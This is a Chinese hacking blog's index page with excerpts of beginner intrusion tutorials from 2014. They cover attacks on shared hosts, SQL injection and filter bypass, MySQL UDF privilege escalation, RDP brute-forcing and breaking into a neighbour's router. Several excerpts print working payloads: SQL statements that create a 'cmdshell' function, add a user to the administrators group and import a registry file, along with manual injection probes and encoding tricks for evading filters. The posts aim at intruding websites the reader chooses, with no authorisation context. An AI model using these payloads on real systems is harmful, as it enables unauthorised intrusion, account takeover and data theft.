• 浅谈网站旁注入侵思路及需要的条件

    浅谈网站旁注入侵思路及需要的条件
    什么叫旁注旁注:顾名思义就是从旁注入,也就是利用主机上面的一个虚拟站点进行渗透。 得到我们所要得到一个重要关节webshell之后, 再利用主机的开放的程序以及一些非安全设置进行的跨站式入侵方法。  旁注的过程:  1.利用工具或者网站WHOIS你所要攻击的目标资料,得到关于网站的域名注册信息以及主机是否是虚拟主机的确定, 因为这样子才可以从旁注入。  2.看服务器上面...阅读全文
    作者:qxz_xp | 发布:2014年5月07日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • SQLmap简介以及防火墙绕过方法

    SQLmap简介以及防火墙绕过方法
    简介     许多现实中对于网站的攻击往往是由于网站没有及时更新或者对于用户的输入没有进行检查。从缓冲区溢出说起,这样一种针对系统脆弱性的威胁,最根本的问题还是在于对于用户的输入没有进行检查。作为主要威胁之一的SQL注入带来了人们对于其应用和数据库的担忧。这个问题的出现有十年的时间了,但是现在仍旧在许多网站中出现。SQL注入就像许多当前主要的的web应用安全...阅读全文
    作者:qxz_xp | 发布:2014年4月16日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
    阅读全文

  • 浅谈新手寻找XSS时所存在的一些误区

    浅谈新手寻找XSS时所存在的一些误区
    1. 误区1: XSS,不是专门去“绕过”限制。 打个简单的比方,一个已经被层层把守的大门,面前荆棘无数,而你又单枪匹马的,怎么闯的进去? 这个时候你要意识到,走大门是不可能的。其实我们要突破的城防,有很多小门可以进去的,甚至不需要任何手段就可以直接走进去。我们为什么不走呢? XSS是很好防御的,不就是过滤一下么,所以我们不要太多寄希望与程序员错误的过滤逻辑,...阅读全文
    作者:qxz_xp | 发布:2014年4月12日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • mysql提权方法总结四则

    mysql提权方法总结四则
    一 UDF提权 这类提权方法我想大家已经知道了,我大致写一下,具体语句如下: create function cmdshell returns string soname ’udf.dll’  select cmdshell(’net user iis_user /add’);  select cmdshell(’net localgroup administrators iis_user /add’);  select cmdshell(’regedit /s d:\web\3389.reg’);  drop function cmdshell;  select cmdshell(’netstat -an’); 二 ...阅读全文
    作者:qxz_xp | 发布:2014年4月06日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • 手工注入命令总汇

    手工注入命令总汇
    1.判断是否有注入;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.注入参数是字符’and [查询条件] and ”=’ 4.搜索时没过滤参数的’and [查询条件] and ‘%25’=’ 5.判断数据库系统  ;and (select count(*) from sysobjects)>0 mssql  ;and (select count(*) from msysobjects)>0 access 6.猜数据库;and (select Co...阅读全文
    作者:qxz_xp | 发布:2014年4月01日 | 分类:菜鸟入门, 黑客攻防 | 1条评论
    阅读全文

  • 无需工具秒破网页上的星号密码(代码法)

    无需工具秒破网页上的星号密码(代码法)
    浏览器会记住你输入的密码本来没有什么好怕的,但是人天生就是懒的,“记住密码”用多了也就直接导致了你记不住密码了。虽然在网页中记住密码功能大部分调用 cookies 或者是储存在浏览器记录中,并且有大量的类似软件可以读取其中的密码,但是感觉很不安全和方便,如果用软件你并不能够保证软件有没有后门,如果自己去找 cookies 进行密码的找回 cookies 又大多加密或者很难找...阅读全文
    作者:qxz_xp | 发布:2014年3月25日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • 攻下隔壁女生路由器后,我都做了些什么

    攻下隔壁女生路由器后,我都做了些什么
    其实这个问题可以理解为:蹭网之后,能做些什么? 不少人的八卦心窥探欲还是很强烈的,强烈到让人恐惧。所以很多人喜欢看一些八卦文章,比如:如何优雅的窥探别人? 通常这样的文章很容易火起来,因为不少人都喜欢看而且百看不厌。 最近路由安全沸沸扬扬,可以翻阅我微信公众号历史文章查看关于路由安全的文章以及央视当时的采访。鉴于天时地利人和,最后我成功的在现实生...阅读全文
    作者:qxz_xp | 发布:2014年3月18日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • 分享入侵指定网站的一些思路

    分享入侵指定网站的一些思路
    如何入侵指定网站! 首先,观察指定网站。 入侵指定网站是需要条件的: 要先观察这个网站是动态还是静态的。 首先介绍下什么样站点可以入侵:我认为必须是动态的网站 如ASP、PHP、 JSP等代码编写的站点 如果是静态的(.htm或html),一般是不会成功的。 如果要入侵的目标网站是动态的,就可以利用动态网站的漏洞进行入侵。 Quote:以下是入侵网站常用方法: 1.上传漏洞  如果...阅读全文
    作者:qxz_xp | 发布:2014年3月09日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • 细谈php手工注入拿webshell方法

    细谈php手工注入拿webshell方法
    目标网站:http://www.xxx.org.cn:81 注入点: http://www.xxx.org.cn:81/news.php?id=780 1.认识注入类型 不管是asp.aspx.php,注入的标准类型必为 http://www.xxxx.com/aa.asp?p=xxx http://www.xxxx.com/aa.aspx?p=xxx http://www.xxxx.com/aa.php?p=xxx 2.判断是否存在注入 不管是asp.aspx.php,注入点的判断都是这样的 http://xxx.xxx.xxx.xxx/down/show.php?id=26 and 1=...阅读全文
    作者:qxz_xp | 发布:2014年3月08日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 暂无评论
    阅读全文

  • 浅谈各种网络环境渗透测试简述

    浅谈各种网络环境渗透测试简述
    一、渗透测试概念 渗透测试 (penetration test)并没有一个标准的定义,国外一些安全组织达成共识的通用说法是:渗透测试是通过模拟恶意黑客的攻击方法,来评估计算机网络系统安全的一种评估方 法。这个过程包括对系统的任何弱点、技术缺陷或漏洞的主动分析,这个分析是从一个攻击者可能存在的位置来进行的,并且从这个位置有条件主动利用安全漏洞。 渗透测试还具有的两个显...阅读全文
    作者:qxz_xp | 发布:2014年3月06日 | 分类:菜鸟入门, 黑客技术, 黑客攻防 | 1条评论
    阅读全文

  • 3389爆破服务器技术全过程与原理

    3389爆破服务器技术全过程与原理
    其实爆破服务器很简单的,也是必学的。 3389是一个远程桌面的端口,很多人为了更方便管理服务器,更新服务器上的资源等,经常会开启3389端口,用nastat-an命令可以查看该端口的开启。对于一个账户如果账号密码过于弱很容易被爆破到,一般默认账号为Administrator或admin,而对于过于简单的密码,在3389密码字典中均可找到,下面来讲解爆破3389服务器,获得一台服务器的全过...阅读全文
    作者:qxz_xp | 发布:2014年2月24日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文

  • 绕过防注入的几种方法思路

    绕过防注入的几种方法思路
    1、运用编码技术绕过 如URLEncode编码,ASCII编码绕过。例如or 1=1即%6f%72%20%31%3d%31,而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)。 2、通过空格绕过 如两个空格代替一个空格,用Tab代替空格等,或者删除所有空格,如 or swords =‘swords,由于mssql的松散性,我们可以把or swords 之间的空格去掉,并不影响运行。 3、运用字符串判断代替 用经典的or 1=1判断...阅读全文
    作者:qxz_xp | 发布:2014年2月22日 | 分类:菜鸟入门, 黑客攻防 | 暂无评论
    阅读全文